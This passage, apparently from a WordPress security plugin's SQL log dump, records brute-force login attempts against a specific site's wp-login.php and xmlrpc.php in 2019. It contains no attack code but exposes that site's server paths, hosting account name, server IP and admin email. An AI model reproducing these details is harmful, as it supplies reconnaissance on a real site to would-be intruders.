empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"40908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIN1kQGijxhVPhG1M0yXwAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568804310.6692\";s:12:\"REQUEST_TIME\";s:10:\"1568804310\";}}','notice','2019-09-18 10:58:32','2019-09-18 10:58:31',17741312,19233320,'https://bintara.com.my/wp-login.php',1,0,'103.90.224.155'),(25034,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"41566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIN2TYpjlmVadK6PeGlYAAAAMI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568804313.4945\";s:12:\"REQUEST_TIME\";s:10:\"1568804313\";}}','notice','2019-09-18 10:58:35','2019-09-18 10:58:33',18258984,19556888,'https://bintara.com.my/xmlrpc.php',1,0,'103.90.224.155'),(25035,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"37788\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIOI8rWzCkhZpjT3iN16QAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568804387.8657\";s:12:\"REQUEST_TIME\";s:10:\"1568804387\";}}','notice','2019-09-18 10:59:49','2019-09-18 10:59:48',17741112,19232360,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(25036,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"38260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIOJsrWzCkhZpjT3iN16gAAAUY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568804390.7265\";s:12:\"REQUEST_TIME\";s:10:\"1568804390\";}}','notice','2019-09-18 10:59:52','2019-09-18 10:59:51',18258960,19555336,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(25037,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.239.113\";s:11:\"REMOTE_PORT\";s:5:\"12117\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIPiMrWzCkhZpjT3iN21wAAAUU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568804745.6125\";s:12:\"REQUEST_TIME\";s:10:\"1568804745\";}}','notice','2019-09-18 11:05:47','2019-09-18 11:05:46',17744712,19235640,'https://bintara.com.my/wp-login.php',1,0,'188.166.239.113'),(25130,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"46688\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM3VM@trAUOPPoD0z1NAgAAANg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568880469.0782\";s:12:\"REQUEST_TIME\";s:10:\"1568880469\";}}','notice','2019-09-19 08:07:50','2019-09-19 08:07:49',18257872,19555696,'https://bintara.com.my/xmlrpc.php',1,0,'74.115.209.253'),(25131,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.19.134.121\";s:11:\"REMOTE_PORT\";s:5:\"41758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM6y9Ahg@A20WI2ffh4ewAAAQI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568881356.0108\";s:12:\"REQUEST_TIME\";s:10:\"1568881356\";}}','notice','2019-09-19 08:22:37','2019-09-19 08:22:36',17745504,19236592,'https://bintara.com.my/wp-login.php',1,0,'185.19.134.121'),(25132,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.19.134.121\";s:11:\"REMOTE_PORT\";s:5:\"42290\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM6ztAhg@A20WI2ffh4fQAAARM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568881358.9384\";s:12:\"REQUEST_TIME\";s:10:\"1568881358\";}}','notice','2019-09-19 08:22:40','2019-09-19 08:22:39',18259448,19557824,'https://bintara.com.my/xmlrpc.php',1,0,'185.19.134.121'),(25133,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"54.66.133.13\";s:11:\"REMOTE_PORT\";s:5:\"46120\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM@Bdd7mFxrJDg7xkLtaQAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568882181.371\";s:12:\"REQUEST_TIME\";s:10:\"1568882181\";}}','notice','2019-09-19 08:36:22','2019-09-19 08:36:21',17741416,19232240,'https://bintara.com.my/wp-login.php',1,0,'54.66.133.13'),(25134,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 